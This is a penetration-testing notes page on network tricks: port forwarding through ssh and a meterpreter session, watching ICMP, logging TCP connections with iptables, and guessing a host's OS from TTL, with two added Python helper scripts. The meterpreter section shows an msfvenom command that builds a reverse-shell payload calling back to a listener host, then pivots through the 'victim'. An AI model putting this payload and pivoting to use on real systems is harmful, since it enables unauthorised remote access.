
Network tricks

Port forwarding

The example.com machine has a web server running on port 8000 internally (not exposed to the internet). With any of the following methods you can reach that web server from http://localhost:4444 on your own machine.

Using SSH

ssh -L 4444:127.0.0.1:8000 user@example.com

Using metasploit (meterpreter)

  • Generate the payload (saved here as exploit.bin) with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST=10.132.0.2 LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Set up the listener.
$ msfconsole
...
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
LHOST => 10.132.0.2
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.132.0.2:9001
[*] Meterpreter session 1 opened (10.132.0.2:9001 -> 10.154.0.2:45462 ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Add the port forward from the meterpreter session.
meterpreter > portfwd add -l 4444 -p 8000 -r 127.0.0.1
[*] Local TCP relay created: :4444 <-> 127.0.0.1:8000
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1      127.0.0.1:8000  0.0.0.0:4444  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:4444

Meaning of the portfwd options:

  • -l : Port on your local machine (attacker machine).
  • -p : Port on the remote machine (victim machine).
  • -r : Target host, as reachable from the victim machine (127.0.0.1 here, i.e. the victim itself).
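Both ssh -L and meterpreter portfwd do the same thing under the hood: a listener on your machine accepts a connection and relays its bytes to host:port as seen from the far end. The following minimal TCP relay is an added example (not code from the page, from OpenSSH or from Metasploit) that shows that mechanism on a single host; the "internal web server" is a constructed stub that upper-cases whatever it receives, and the ssh/meterpreter transport between the two legs is replaced by a plain socket. Port 4444 and the names start_forwarder, start_stub_service and relay_roundtrip are this example's own choices.

```python
"""Minimal local TCP port forwarder: the mechanism behind `ssh -L` and
meterpreter `portfwd add`. Added example, not the page's or any tool's code."""
import socket
import threading


def read_to_eof(sock):
    """Read until the peer half-closes; returns all bytes received."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            break
        chunks.append(data)
    return b"".join(chunks)


def pipe(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the far end sees EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client, remote_host, remote_port):
    """Open the second leg to the target (the -r/-p side) and relay both ways."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()  # target unreachable: drop the client connection
        return
    remote.settimeout(None)
    back = threading.Thread(target=pipe, args=(remote, client), daemon=True)
    back.start()
    pipe(client, remote)
    back.join()
    client.close()
    remote.close()


def _listen(bind_addr, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((bind_addr, port))
    sock.listen(16)
    return sock


def start_forwarder(local_port, remote_host, remote_port, bind_addr="127.0.0.1"):
    """Start the local listener (-l/-L side) in a background thread.
    Returns (listening socket, bound port); local_port 0 picks a free port."""
    listener = _listen(bind_addr, local_port)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:  # listener closed: stop accepting
                return
            threading.Thread(target=handle, args=(client, remote_host, remote_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener, listener.getsockname()[1]


def start_stub_service(port=0):
    """Constructed stand-in for the internal web server on port 8000:
    reads a request until EOF and answers with it upper-cased."""
    srv = _listen("127.0.0.1", port)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(read_to_eof(conn).upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(local_port, payload):
    """Client side (what `curl localhost:4444` would do): connect to the local
    forwarder, send payload, half-close, return everything the target answered."""
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return read_to_eof(s)


if __name__ == "__main__":
    _, service_port = start_stub_service()                    # plays "port 8000"
    _, fwd_port = start_forwarder(4444, "127.0.0.1", service_port)
    print(relay_roundtrip(fwd_port, b"GET / HTTP/1.0\r\n\r\n"))
```

The half-close in pipe() is the detail that trips up naive relays: request/response services like the stub wait for EOF before answering, and the forwarder has to propagate that EOF without tearing down the other direction. The same applies when reading the meterpreter portfwd list output above: "Local" is where the relay listens and "Remote" is where each accepted connection is forwarded to, from the victim's point of view.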

Using chisel

Ping

Use tcpdump to watch for ICMP echo requests and replies on an interface.

$ sudo tcpdump icmp -n
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlp3s0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
18:53:25.737055 IP 192.168.117.150 > 192.168.117.58: ICMP echo request, id 1, seq 1, length 64
18:53:25.737224 IP 192.168.117.58 > 192.168.117.150: ICMP echo reply, id 1, seq 1, length 64

TCP connections

Add an iptables rule that logs every new incoming TCP connection on the interface.

$ sudo iptables -A INPUT -p tcp -m state --state NEW -j LOG --log-prefix "New TCP connection: " -i wlp3s0

Info

To remove the rule again, run the same command with -A replaced by -D.

View the log:

$ journalctl -k --grep='New TCP connection: '
Sep 26 19:04:24 arch kernel: New TCP connection: IN=wlp3s0 OUT= MAC=XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX SRC=192.168.117.150 DST=192.168.117.58 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=25957
...

OS Information gathering

Linux machines send packets with an initial TTL of 64, Windows machines with an initial TTL of 128. Every router on the path decrements the TTL by one, so a TTL seen in a ping reply (ttl=) or in the iptables log above (TTL=) that is slightly below 64 usually points to a Linux host, and one slightly below 128 to a Windows host.

$ ping localhost
PING localhost(localhost (::1)) 56 data bytes
64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.058 ms
64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.131 ms
64 bytes from localhost (::1): icmp_seq=3 ttl=64 time=0.078 ms
^C
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2019ms
rtt min/avg/max/mdev = 0.058/0.089/0.131/0.030 ms
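The TTL heuristic is easy to apply by hand on one line, but it pays to script it over the ping output and the iptables LOG lines from the "TCP connections" section, since both carry the field (lower-case ttl= in ping, upper-case TTL= in the kernel log). The script below is an added example, not code from the page; it extends the page's two values with the common 255 initial TTL used by many network devices, recovers the source address from either format, and reports the probable OS family and hop count. The sample lines are constructed (two taken from the page, one invented Windows-looking log line, and one tcpdump line that carries no TTL and is skipped).

```python
"""Guess OS family and hop count from the TTL in ping / iptables LOG lines.
Added example; the initial-TTL table is the usual heuristic, not a fact the page states."""
import re
from typing import Optional

# Common initial TTLs. Observed TTL = initial TTL - hops traversed, so we pick the
# smallest initial value that is >= the observed one.
INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "network device/Solaris"}

TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)   # ping: ttl=64, iptables LOG: TTL=64
SRC_RE = re.compile(r"\bSRC=(\S+)")                   # iptables LOG target
FROM_RE = re.compile(r"\bfrom (\S+?)[:\s]")           # ping reply: "from host (addr):" or "from addr:"

# Constructed sample input (two lines copied from the page, one invented, one tcpdump line without TTL).
SAMPLE_LINES = [
    "64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.058 ms",
    "Sep 26 19:04:24 arch kernel: New TCP connection: IN=wlp3s0 OUT= MAC=XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX "
    "SRC=192.168.117.150 DST=192.168.117.58 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=25957",
    "Sep 26 19:05:01 arch kernel: New TCP connection: IN=wlp3s0 OUT= "
    "SRC=192.168.117.77 DST=192.168.117.58 LEN=52 TOS=0x00 PREC=0x00 TTL=126 ID=4242",   # invented
    "18:53:25.737055 IP 192.168.117.150 > 192.168.117.58: ICMP echo request, id 1, seq 1, length 64",
]


def guess_os(ttl: int):
    """Return (os_family, estimated_hops) for an observed TTL."""
    if not 0 < ttl <= 255:
        raise ValueError(f"TTL out of range: {ttl}")
    for initial in sorted(INITIAL_TTLS):
        if ttl <= initial:
            return INITIAL_TTLS[initial], initial - ttl
    raise AssertionError("unreachable: 255 covers every valid TTL")


def ttl_from_line(line: str) -> Optional[int]:
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def source_from_line(line: str) -> str:
    """Source address: SRC= for kernel LOG lines, 'from X' for ping replies, else '?'."""
    for rx in (SRC_RE, FROM_RE):
        m = rx.search(line)
        if m:
            return m.group(1)
    return "?"


def analyze(lines):
    """One record per line that carries a TTL; lines without one are skipped."""
    rows = []
    for line in lines:
        ttl = ttl_from_line(line)
        if ttl is None:
            continue
        family, hops = guess_os(ttl)
        rows.append({
            "src": source_from_line(line),
            "ttl": ttl,
            "family": family,
            "hops": hops,
            # a host tens of hops away is unusual on a LAN; flag it as a weak guess
            "confidence": "low" if hops > 30 else "ok",
        })
    return rows


if __name__ == "__main__":
    for row in analyze(SAMPLE_LINES):
        print(f"{row['src']:<18} ttl={row['ttl']:<3} -> {row['family']} "
              f"({row['hops']} hops, confidence {row['confidence']})")
```

Treat the result as a hint, not an identification: a packet from a 255-TTL device that crossed 130 routers looks identical to a Windows host two hops away, and some systems let the initial TTL be changed. The confidence field only catches the implausible-hop-count case.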